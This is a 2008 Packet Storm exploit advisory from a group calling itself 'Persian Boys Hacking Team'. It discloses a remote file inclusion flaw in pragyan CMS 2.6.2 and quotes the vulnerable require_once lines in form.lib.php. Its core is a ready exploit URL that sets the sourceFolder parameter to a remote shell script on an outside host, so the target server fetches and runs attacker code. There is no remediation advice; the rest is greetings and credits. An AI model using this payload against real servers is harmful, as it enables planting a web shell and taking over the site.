pragyan-rfi.txt

2008-07-15T00:00:00
ID PACKETSTORM:68194
Type packetstorm
Reporter N3TR00T3R
Modified 2008-07-15T00:00:00

Description

                                        
                                            ` << In The Name Of GOD >>  
  
  
-------------------------------------------------------------  
- [ Persian Boys Hacking Team ] -:- 2008  
-  
- discovered by N3TR00T3R [at] Y! [dot] com  
- pragyan 2.6.2 Remote File Includion  
- download :http://sourceforge.net/project/showfiles.php?group_id=220286   
- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd  
r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser  
Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...  
[www.Persian-Boys.com] & [www.irchatan.com]  
--------------------------------------------------------------  
  
if register_globals = On;  
  
  
Vul Code : [/cms/modules/form.lib.php]  
##########################################################  
#global $sourceFolder;  
#global $moduleFolder;  
#require_once("$sourceFolder/$moduleFolder/form/editform.php");  
#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");  
#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");  
#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");  
#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");  
##########################################################  
  
Exploit :   
  
##########################################################  
#  
# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?  
#  
##########################################################  
  
`